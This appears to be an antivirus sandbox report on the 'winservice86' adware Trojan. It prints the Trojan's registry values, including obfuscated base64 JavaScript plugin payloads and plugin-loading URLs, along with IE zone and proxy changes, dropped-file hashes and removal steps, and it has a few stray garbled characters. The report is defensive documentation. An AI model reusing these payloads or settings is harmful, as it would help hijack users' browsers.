"AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com*************************************************************************************/appAPI.ready(function($) { // Place your code here (you can also define new functions above this scope) // The $ object is the extension's jQuery object // alert(My new Crossrider extension works! The current page is: document.location.href);});"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
"CrAppId" = "64755"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\winservice86\Plugins\253]
"Version" = "2"
[HKCU\Software\winservice86\Plugins\64]
"Version" = "3"
[HKCU\Software\winservice86\Plugins\37]
"Name" = "IEBrowserEvents"
[HKCU\Software\winservice86\Plugins\36]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eve "
[HKCU\Software\winservice86\Plugins\193]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/193.js"
[HKCU\Software\winservice86\Plugins\91]
"Name" = "monetizationLoader.js"
[HKCU\Software\winservice86\Plugins\195]
"Name" = "icm_convertmedia_m"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF AF 19 13 6E D9 43 A2 1F 03 EB 80 2E B4 B6 BE"
[HKCU\Software\InstalledBrowserExtensions\17638]
"64755" = "winservice86"
[HKCU\Software\winservice86\Plugins\269]
"Version" = "1"
[HKLM\SOFTWARE\InstalledBrowserExtensions\17638]
"64755" = "winservice86"
[HKLM\SOFTWARE\winservice86\IE\Profiles]
"S-1-5-21-1844237615-1960408961-1801674531-1003" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\winservice86\Manifest]
"BgVersion" = "1"
[HKCU\Software\winservice86\Plugins]
"PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,47,94"
[HKCU\Software\winservice86\Plugins\354]
"Name" = "categories"
[HKCU\Software\winservice86\Plugins\13]
"Name" = "CrossriderAppUtils"
[HKCU\Software\winservice86\Plugins\17]
"Version" = "4"
[HKCU\Software\winservice86\Plugins\262]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/262.js"
[HKCU\Software\winservice86\Plugins\37]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/37.js"
[HKCU\Software\winservice86\Plugins\288]
"URL" = "http://js.newcloudrack.com/plugins/mins/288.js"
[HKCU\Software\winservice86\Plugins\2]
"Name" = "ie8_fix_1"
[HKCU\Software\winservice86\Plugins\42]
"JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;Ç‘"
[HKCU\Software\winservice86\Plugins\354]
"URL" = "http://js.newcloudrack.com/plugins/mins/354.js"
[HKCU\Software\winservice86\Plugins\38]
"Version" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
"UninstallString" = "%Program Files%\winservice86\Uninstall.exe /fcp=1"
[HKCU\Software\winservice86\Plugins\262]
"Name" = "pops_5_j_m"
[HKCU\Software\winservice86\Plugins\37]
"Version" = "6"
[HKCU\Software\winservice86\Installer]
"Params" = "{ source_id : 002201, sub_id : 0, uzid : 0"
[HKCU\Software\winservice86\Plugins\275]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDg2MzcwNGUwNDA1MTExYTM2MDExZjRiNDM0YzRlMTkxMTFlMTM0OTVjNDYwZTFmNDIwMTE3MDMwMDE2MTcwYzBkMDkwZjA1NGIwOTBjMWU1YzFhNTYxYzA4MWIxNjVmNTA0YTRiNWIxODVmNWM0MDUzMDg1NDExNWQwMzBhNTMxZjE4MDE1NzNjMmMzMDNiMzYzZjNmMjMyYzJlMjYyMTJjMmMyMTM4MjkzZjIxMmYyNzJjMjAzYzNiMzMyNTM1M2EzNTQ1MTIwMzE5MTcwZDAxMTQ1ODM1M2MzMDIxMjYyYTNmM2UzODIxMmYzMTJjMzIzOTI5MzMyMjMwMjgyZjNjMmM1MTQ1NzM2NTRlMTkxMTFlMTMwMDI2MWIxNTRlNTY1MTQ3MDIxNzA3MDMxYTQzNDM0MzA2MTY0NDEzMDExYTBhMWMwODA5MDUwMDA5MTc1ZDEwMDYxNDQzMWY1ZTE1MGUwOTAwNDY1YTQwNTQ1ZTEwNTY1YTUyNDUxMTVlMWI0MjA2MDI1YTE5MGExNzRlMzYyNjJmM2UzZTM2MzkzMTNhMzcyYzJiMzMyOTI5MzEyZjJkMzczNjJkMjYzZjM5MzMzYTIzMjcyYzJjNGYxODFjMWMxZjA0MDcwNjRlMmMzNjNhM2UyMzIyMzYzODJhMzczNjNiMjYyZDNjMjEzYTI0MjIzZTM2MzYyNjRlNDA3YjZjNDgxMzFmMDYwZTEwMDIyNTE1NDc1MDQzNDE0NDVjNzMxMQ==', 'siyllqejcs'); }"
[HKCU\Software\winservice86\Plugins\391]
"Name" = "50intext_new_m"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\winservice86\Plugins\200]
"URL" = "http://js.newcloudrack.com/plugins/mins/200.js"
[HKCU\Software\winservice86\Plugins]
"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,47,269,93,102,104,128,180,184,193,220,195,221,223,230,242,262,263,273,275,289,91"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
"DisplayVersion" = "1.35.9.29"
[HKCU\Software\winservice86\Plugins\269]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY2ZjYzNTExZjFmMWMxMjNhMDIxODQ3NTA1MzU1MDMxYzE2MWY0YTViNGExYTBiNTkwNjExMDMwYzA0MWQxMzBmMDAwMzBhMWMxMTQxMTMxYjA4NDUxMjE0MWYwMTE0MGE1ZjFkMDA0NDE5MDQ1NDFhMGMwYjRkMmIzYTM4M2QzMzM0Mzc0MDQzN2E3ZDQ3MDIwNzAzMWIxYjM3MWQxYzU2NWY0YTUxMWYxZjFjMTIxYzRhNWI0YTA4NDAxOTUzMDY1MTAxNDI1YTE2MTkxZjU5MDMxZjAxMGIxZTVhMGIwZjA3NTgwYTBiMTYwNjA2MTE0YTAzMTY1OTAxMWI1ZDFkMWUxMDU4MzUyYzI1MjUyYzNkMzA1MjU4NmY2MzUxMDcwNzFkMDUwNjFlM2QwMTQ4NDk1NzU5NWU1YjY1MGQ=', 'tejswkhbop'); }"
[HKCU\Software\winservice86\Plugins\180]
"Name" = "bpo_serp_m"
[HKCU\Software\winservice86\Plugins\35]
"Version" = "4"
[HKCU\Software\winservice86\Plugins\46]
"Name" = "IETimers"
[HKCU\Software\winservice86\Plugins\289]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ2ZjQyNTQ1MzU0NDgwNDAwMTUwNjMwMTAxODUxNGU0YTRlMWMxNTAyMTU1ODViNWMxNTQ0MTQxMjEzMTMwMDExMTEwMTAyMDMwZjExNGYxNTBhMGY1YjAzMTUxODE4MWEwNDA0NGEwZjFkMWY0NjNjNWMyMzEyNTk1YTAxMWQxNzQ5NTk1YjUyMTIxZjAxNWYyYjJjMzczODIzMjczMjI0MmMyNjMxMjEyYjJmMzQyMDI0MzgyMTI3MzAyYzI3M2YyZTJiMjgzMjNhM2Q1MjEyMTAwZTJmMzY1YzQ3NDMwMzA0MDMwMDAzMTgxODA0NGIzYTNkMzcyMTNiMzkzZjI2MjgzMjIwMzAyYjMyMjQzYTMzM2EyMDNiMjAzZDJiNTE1ODYwNGM1NDQxNTY0NzBhMDAwNzA0MTkzOTA2MGQ1NDVmNDI1NjFiMDAxZTFjMDc1YjU5NGEwMzVhMGIxMjE4MDkxMTEyMTMxNzE0MWQxMDExNDQwZjFiMGM1OTE1MDMwNjA3MWEwZjFlNWIwYzFmMDk1MDIyNDMyMzE5NDM0YjAyMWYwMTVmNDc0NDUyMTkwNTEwNWMyOTNhMjEyNjNjMjczOTNlM2QyNTMzMzczZDMxMmIyMDJmMjIzMDI0MzIzYTMxMjEzMTJiMjMyODJiM2U1MDA0MDYxMDMwMzY1NzVkNTIwMDA2MTUxNjFkMDcxODBmNTEyYjNlMzUzNzJkMjcyMDI2MjMyODMxMzMyOTI0MzIyNDJjM2EyYjIxMzEzZTI5NDc0ZTdlNTM1NDRhNGM1NjExMWExMDA1MWQxZDNkMGU0ZTRlNDE0NDVkNWI3ZTBl', 'vebtstjlta'); }"
[HKCU\Software\winservice86\Plugins\3]
"Version" = "2"
[HKCU\Software\winservice86\Plugins]
"BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"winservice86-bg.exe" = "8000"
[HKCU\Software\winservice86\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,7,9,93,102,104,128,180,184,193,220,195,221,223,230,242,262,263,273,275,289,91"
[HKCU\Software\winservice86\Plugins\13]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/13.js"
[HKCU\Software\winservice86\Plugins\7]
"Version" = "2"0?0:>0>10?0>
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following registry key(s):
[HKCU\Software\winservice86\Plugins\39]
[HKCU\Software\winservice86\Plugins\38]
[HKCU\Software\winservice86\Plugins\195]
[HKCU\Software\winservice86\Plugins\94]
[HKCU\Software\winservice86\Plugins\193]
[HKCU\Software\winservice86\Plugins\35]
[HKCU\Software\winservice86\Plugins\78]
[HKCU\Software\winservice86\Plugins\37]
[HKCU\Software\winservice86\Plugins\36]
[HKCU\Software\winservice86\Plugins\221]
[HKCU\Software\winservice86\Plugins\220]
[HKCU\Software\winservice86\Plugins\223]
[HKCU\Software\winservice86\Plugins\7]
[HKCU\Software\winservice86\Plugins\242]
[HKCU\Software\winservice86\Plugins\4]
[HKCU\Software\winservice86\Plugins\9]
[HKCU\Software\winservice86\Plugins\102]
[HKCU\Software\winservice86\Plugins\104]
[HKCU\Software\winservice86\Plugins\275]
[HKCU\Software\winservice86\Plugins\93]
[HKCU\Software\winservice86\Plugins\273]
[HKCU\Software\winservice86\Plugins\128]
[HKCU\Software\winservice86\Plugins\17]
[HKCU\Software\winservice86\Plugins\14]
[HKCU\Software\winservice86\Plugins\13]
[HKCU\Software\winservice86\Plugins\64]
[HKCU\Software\winservice86\Plugins\44]
[HKCU\Software\winservice86\Plugins\45]
[HKCU\Software\winservice86\Plugins\46]
[HKCU\Software\winservice86\Plugins\47]
[HKCU\Software\winservice86\Plugins\40]
[HKCU\Software\winservice86\Plugins\41]
[HKCU\Software\winservice86\Plugins\42]
[HKCU\Software\winservice86\Plugins\43]
[HKCU\Software\winservice86\Plugins\230]
[HKCU\Software\winservice86\Plugins\2]
[HKCU\Software\winservice86\Plugins\180]
[HKCU\Software\winservice86\Plugins]
[HKCU\Software\winservice86\Plugins\184]
[HKLM\SOFTWARE\Tempo]
[HKCU\Software\winservice86\Plugins\3]
[HKCU\Software\winservice86\Plugins\269]
[HKCU\Software\winservice86\Plugins\246]
[HKCU\Software\winservice86\Plugins\91]
[HKCU\Software\winservice86\Plugins\289]
[HKCU\Software\winservice86\Plugins\263]
[HKCU\Software\winservice86\Plugins\262]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe:3000 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 6C 4D 87 58 83 77 EF FB 92 B7 FB BE 3A 32 6B"
Dropped PE files
MD5 | File path |
---|---|
03114dadbd9977fc823f95b21fb987e7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\GoogleCrashHandler.exe |
d858ba2ee718b1db1ced20646e641d08 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\GoogleUpdate.exe |
f98de4108614e4bb81e95e58e36c7000 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\GoogleUpdateBroker.exe |
7e767b342e55eb1dfd74a65d24ea4b70 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\GoogleUpdateOnDemand.exe |
a608387077284a570bb8a063575e3ca3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\goopdate.dll |
8aa4451ed8a9bc44505c6bab7ab92094 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\goopdateres_en.dll |
4f6d8d7cdeb95bc4d4fa946a3195e657 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\npGoogleUpdate4.dll |
fefef2f226fd6be184bc4a3378b02aaf | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\psmachine.dll |
8d90bb3a36521b50d0e512a781e36871 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\psuser.dll |
03114dadbd9977fc823f95b21fb987e7 | c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe |
d858ba2ee718b1db1ced20646e641d08 | c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe |
f98de4108614e4bb81e95e58e36c7000 | c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe |
7e767b342e55eb1dfd74a65d24ea4b70 | c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe |
a608387077284a570bb8a063575e3ca3 | c:\Program Files\globalUpdate\Update\1.3.25.0\goopdate.dll |
8aa4451ed8a9bc44505c6bab7ab92094 | c:\Program Files\globalUpdate\Update\1.3.25.0\goopdateres_en.dll |
4f6d8d7cdeb95bc4d4fa946a3195e657 | c:\Program Files\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll |
fefef2f226fd6be184bc4a3378b02aaf | c:\Program Files\globalUpdate\Update\1.3.25.0\psmachine.dll |
8d90bb3a36521b50d0e512a781e36871 | c:\Program Files\globalUpdate\Update\1.3.25.0\psuser.dll |
d858ba2ee718b1db1ced20646e641d08 | c:\Program Files\globalUpdate\Update\GoogleUpdate.exe |
2c523048ebd358d626fb8bd7b1ad571a | c:\Program Files\winservice86\0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe |
5b833b50e9d596b0d3ce325136c0c4fb | c:\Program Files\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-11.exe |
34b74aa995e73bdd4b9d5060a6855615 | c:\Program Files\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-2.exe |
e88ccd8a681b1a12eb53483303dc7692 | c:\Program Files\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-4.exe |
6371f0c089ae8fc66b873ec8bb9dc5d2 | c:\Program Files\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-5.exe |
ebf09dc278d70dc6d2ab6f0aec4288b1 | c:\Program Files\winservice86\Interop.IWshRuntimeLibrary.dll |
3a77e9571d9f8748fc5abe0c83f6ec80 | c:\Program Files\winservice86\Newtonsoft.Json.dll |
740ff202a16e18783b38287c16c8d5d8 | c:\Program Files\winservice86\SuperSocket.ClientEngine.Common.dll |
ba883ea86ba520ba129a014f280b1c57 | c:\Program Files\winservice86\SuperSocket.ClientEngine.Core.dll |
de9ace1ad7558a73df25f03c445e779b | c:\Program Files\winservice86\SuperSocket.ClientEngine.Protocol.dll |
5c71031021e9b22bd1f2e1696dec7a76 | c:\Program Files\winservice86\Uninstall.exe |
697c4fdb5abb4e3f19c2c22a5e2ae5a0 | c:\Program Files\winservice86\WebSocket4Net.dll |
3b22b7f149c6bcdb89c2c9d0305aa4ba | c:\Program Files\winservice86\f56fe68c-ded6-4656-a272-5100e7b20016.exe |
df7add30d0339c1c12c82d597bf527e8 | c:\Program Files\winservice86\utils.exe |
2a0e8b0b7075ec87e183337da98ada72 | c:\Program Files\winservice86\winservice86-bg.exe |
682b4c256af1c16ab3bb4e4ab48adcbe | c:\Program Files\winservice86\winservice86-bho.dll |
ffc4214f7d095fb806cdb4240ae620f9 | c:\Program Files\winservice86\winservice86-codedownloader.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
GoogleUpdate.exe:1300
GoogleUpdate.exe:1220
GoogleUpdate.exe:1272
GoogleUpdate.exe:3944
GoogleUpdate.exe:476
GoogleUpdate.exe:2032
GoogleUpdate.exe:1936
17b03655-7c85-4e93-aec7-7ee27469780e-2.exe:2600
f56fe68c-ded6-4656-a272-5100e7b20016.exe:356
17b03655-7c85-4e93-aec7-7ee27469780e-11.exe:1676
17b03655-7c85-4e93-aec7-7ee27469780e-4.exe:1936
winservice86-bg.exe:2952
winservice86-codedownloader.exe:2888
winservice86-codedownloader.exe:2796
regsvr32.exe:2472
%original file name%.exe:1332
0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe:3000 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C3E814D1CB223AFCD58214D14C3B7EAB (220 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab6.tmp (54 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll (5441 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineUA.job (934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar5.tmp (2712 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar9.tmp (2712 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8BD11C4A2318EC8E5A82462092971DEA (477 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineCore.job (930 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab4.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab8.tmp (49 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe (46 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psuser.dll (673 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdateres_en.dll (26 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C3E814D1CB223AFCD58214D14C3B7EAB (341 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe (46 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateHelper.msi (673 bytes)
%Program Files%\globalUpdate\Update\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (49 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8BD11C4A2318EC8E5A82462092971DEA (208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar7.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MSIcdd94.LOG (474 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll (673 bytes)
%Program Files%\globalUpdate\Update\Download\{84F03351-931D-41A5-A53D-6B5A7A5A2C96}\1.3.25.36\setup.exe (7547 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\1F356F4D07FE8C483E769E4586569404 (113 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\B69D763EB21649DA26F20618312DEE70 (75 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\B69D763EB21649DA26F20618312DEE70 (232 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\1F356F4D07FE8C483E769E4586569404 (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\manifest[2].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\275.js (825 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateBroker.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\246.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\7.js (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\update[1].json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\goopdate.dll (5441 bytes)
%Program Files%\winservice86\b0eae4e3-6b8d-4874-83f1-2ee3fd4e727b.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\184[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\180.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-11.dll (45051 bytes)
%Program Files%\winservice86\1293297481.mxaddon (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\13.js (6 bytes)
%Program Files%\winservice86\winservice86-bho.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\17.js (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\492954 (1358266 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\223.js (825 bytes)
%Program Files%\winservice86\Newtonsoft.Json.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins.json (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-2.exe (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\273.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\223[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\200[1].js (887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\220.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\262.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr2.tmp (605555 bytes)
%Program Files%\winservice86\SuperSocket.ClientEngine.Common.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\246[1].js (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\193.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\273[1].js (903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\424[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\4.js (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\289.js (905 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\plugins[1].json (2977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\38.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\220[1].js (19969 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e.xpi (1425 bytes)
%Program Files%\winservice86\SuperSocket.ClientEngine.Protocol.dll (19 bytes)
%Program Files%\winservice86\winservice86-codedownloader.exe (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\128.js (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\43.js (4 bytes)
%Program Files%\winservice86\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\37.js (2 bytes)
%Program Files%\winservice86\winservice86.ico (9 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-4.exe (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\288[1].js (963 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-11.job (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Program Files%\winservice86\winservice86-bg.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\253[1].js (735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\9.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\npGoogleUpdate4.dll (1281 bytes)
%WinDir%\Tasks\f56fe68c-ded6-4656-a272-5100e7b20016.job (1620 bytes)
